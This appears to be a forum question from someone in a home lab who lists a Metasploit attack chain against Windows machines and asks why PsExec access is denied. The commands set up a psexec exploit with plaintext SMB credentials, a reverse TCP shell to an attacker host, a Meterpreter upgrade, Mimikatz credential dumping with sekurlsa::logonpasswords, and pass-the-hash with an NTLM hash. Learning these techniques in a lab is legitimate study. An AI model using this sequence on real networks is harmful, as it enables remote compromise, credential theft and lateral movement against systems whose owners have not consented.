0

Here is setup

Machine 2

  • logged in as user2
  • share folder access granted to user3

Machine 3

  • logged in as user3

Machine 1 (server1.hacklab.local)

  • domain administrator

Here are the commands I used

use exploit/windows/smb/psexec

set rhost 192.168.0.115

set SMBUser user3

set smbdomain server1.hacklab.local

set smbpass Passw0rd%%

set payload windows/shell/reverse_tcp

set lhost 192.168.0.116

use post/multi/manage/shell_to_meterpreter

set lhost 192.168.0.116

run

use post/multi/manage/shell_to_meterpreter

set lhost 192.168.0.116

run

load mimikatz

kiwi_cmd "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords"

kiwi_cmd "sekurlsa::pth /user:administrator /domain:server1.hacklab.local.com /ntlm:a2b02e056870e73f65dc8baa924e76a5"

Using meterpreter session

"PS C:\Users\user3\Downloads\PSTools> .\psexec.exe \\server1 "cmd.exe"

PsExec v2.34 - Execute processes remotely

Copyright (C) 2001-2021 Mark Russinovich

Sysinternals - [www.sysinternals.com](https://www.sysinternals.com/)

PS C:\Users\user3\Downloads\PSTools>

PS C:\Users\user3\Downloads\PSTools> whoami

server1\user3

On machine 2 i run


C:\Users\user3\Downloads\PSTools>psexec.exe \\server1 "cmd.exe"

PsExec v2.34 - Execute processes remotely

Copyright (C) 2001-2021 Mark Russinovich

Sysinternals - [www.sysinternals.com](https://www.sysinternals.com/)

Couldn't access server1:

Access is denied.

What I'm doing wrong here? any clues.

Saladin
  • 1,547
  • 3
  • 14
  • 23

0 Answers0